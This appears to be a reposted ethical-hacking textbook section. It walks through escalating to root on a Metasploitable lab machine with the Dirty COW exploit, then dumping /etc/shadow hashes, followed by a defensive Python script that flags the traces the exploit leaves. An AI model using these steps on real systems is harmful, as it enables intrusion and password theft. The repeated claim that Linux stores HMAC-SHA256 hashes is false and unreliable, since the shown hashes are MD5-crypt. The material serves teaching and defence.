Ethical Hacking 2021.10: PIVOTING AND PRIVILEGE ESCALATION (2) Extracting Password Hashes on Linux

Linux doesn’t store plaintext passwords. Instead, it stores an HMAC-SHA256 hash of the
passwords in the file /etc/shadow. 

The permissions on the /etc/shadow file indicate that only the owner (root) and the group (shadow) can read the file, and that only the root user can write to it.

The unix-privesc-check tool is preinstalled on Kali Linux and allows you to check a system for misconfigurations that might allow a privilege escalation attack:

unix-privesc-check standard

The Meterpreter shell has similar functionality built in. You can
use the command getsystem to search for and exploit possible
privilege escalation vulnerabilities:

meterpreter > getsystem

After you gain root privileges, run the Meterpreter module
hashdump to extract the hashes from the system.

meterpreter > run hashdump

Example: Performing a Dirty COW Privilege Escalation Attack

This example uses a kernel-level vulnerability nicknamed Dirty COW. The vulnerability (CVE-2016-5195) allows an
attacker without root privileges to edit any file by exploiting a bug in how the Linux kernel manages memory.

Run uname -a to get the current Linux kernel version:

msfadmin@metasploitable:~$ whoami
msfadmin
msfadmin@metasploitable:~$ uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008
i686 GNU/Linux

When you have the server’s Linux version, use searchsploit to
search for known vulnerabilities affecting that version:

kali@kali:~$ searchsploit Linux Kernel 2.6.24
------------------------------------------------ -----------------------
Exploit Title | Path
------------------------------------------------ -----------------------
Linux Kernel (Solaris 10 / < 5.10 138888-01) - | solaris/local/15962.c
Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc | linux/local/9844.py
...
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/se | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_P | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE | linux/local/40839.c

Some exploits are more reliable than others. The Dirty COW
PTRACE exploit works reliably on the Linux version running on the
Metasploitable server.
The code for the exploit is available on your Kali Linux virtual
machine. Using searchsploit, supply the exploit number 40839 and
use the -p option to find the path to the exploit code:

kali@kali:~$ searchsploit -p 40839
Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race
Condition Privilege Escalation (/etc/passwd Method)
URL: https://www.exploit-db.com/exploits/40839
Path: /usr/share/exploitdb/exploits/linux/local/40839.c
File Type: C source, ASCII text, with CRLF line terminators

Copy the code onto the Metasploitable machine with scp:

kali@kali:~/$ scp /usr/share/exploitdb/exploits/linux/local/40839.c
[email protected]:~/

Compile the exploit with gcc:

msfadmin@metasploitable:~$ gcc -pthread 40839.c -o kernelexploit -lcrypt

Now run the exploit (kernelexploit). You’ll be prompted to create a new root user (firefart) and provide it with a password. I’ve chosen 147 here:

msfadmin@metasploitable:~$ ./kernelexploit
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 147
Complete line:
firefart:fibyOYsv7UnQ6:0:0:pwned:/root:/bin/bash
mmap: b7fa7000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '147'.

Switch to the newly created user with root privileges:

msfadmin@metasploitable:~$ su firefart
Password:

Now you should be able to read the /etc/shadow file containing
the password hashes:

firefart@metasploitable:/home/msfadmin# cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
...

These entries contain the HMAC-SHA256 hashes of the users'
passwords. You can crack these hashes using the tools introduced
in Chapter 12.
If you succeed, you'll have escalated your privileges
and extracted the plaintext passwords for the system's users.
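The two artifacts this section shows, the firefart line the exploit writes into /etc/passwd and the hash fields in /etc/shadow, are exactly what an auditor or incident responder should look for afterwards. The following script is an added example, not code from the book or from the exploit: it parses constructed sample lines modelled on the output above, flags any uid-0 account other than root and any hash stored directly in /etc/passwd, and classifies each /etc/shadow entry by its crypt(5) prefix (for example $1$ for MD5-crypt, $6$ for SHA-512-crypt, a 13-character field with no $ for traditional DES). Running it against real files instead of the samples is the assumption; the sample contents themselves are constructed.

```python
# Constructed sample lines modelled on the /etc/passwd and /etc/shadow output above.
# The firefart line is what the exploit reports writing; the other entries are placeholders.
PASSWD_SAMPLE = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
firefart:fibyOYsv7UnQ6:0:0:pwned:/root:/bin/bash
"""

SHADOW_SAMPLE = """root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
"""

# crypt(3) hash identifiers as documented in crypt(5).
HASH_PREFIXES = {"$1$": "md5crypt", "$5$": "sha256crypt",
                 "$6$": "sha512crypt", "$y$": "yescrypt"}


def hash_kind(field: str) -> str:
    """Classify a password field: empty, locked, a known crypt(5) scheme, or unknown."""
    if field == "":
        return "empty"            # passwordless login: always a finding
    if field.startswith(("*", "!")):
        return "locked"           # no valid hash, account cannot log in by password
    for prefix, name in HASH_PREFIXES.items():
        if field.startswith(prefix):
            return name
    if len(field) == 13 and "$" not in field:
        return "descrypt"         # traditional DES crypt: 2-char salt + 11 chars
    return "unknown"


def audit_passwd(text: str) -> list[str]:
    """Findings for /etc/passwd: extra uid-0 accounts and hashes kept in field 2."""
    findings = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:      # passwd(5) defines exactly seven fields
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append(f"extra uid-0 account: {name}")
        if pw not in ("x", "*", "!", ""):
            findings.append(f"password hash in /etc/passwd for {name} ({hash_kind(pw)})")
    return findings


def audit_shadow(text: str) -> dict[str, str]:
    """Map each /etc/shadow user to the kind of credential stored for it."""
    return {line.split(":")[0]: hash_kind(line.split(":")[1])
            for line in text.splitlines() if line.count(":") >= 8}
```

On the sample data the firefart entry is reported twice, once as a second uid-0 account and once as a DES-crypt hash stored in /etc/passwd rather than /etc/shadow; both are the traces the exploit leaves behind.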

Tools like spray allow you to test multiple
passwords and connections simultaneously. However, these tools do
unusual things and could generate security alerts, so you'll want to
be careful when using them.


Reposted from blog.csdn.net/lm19770429/article/details/121884998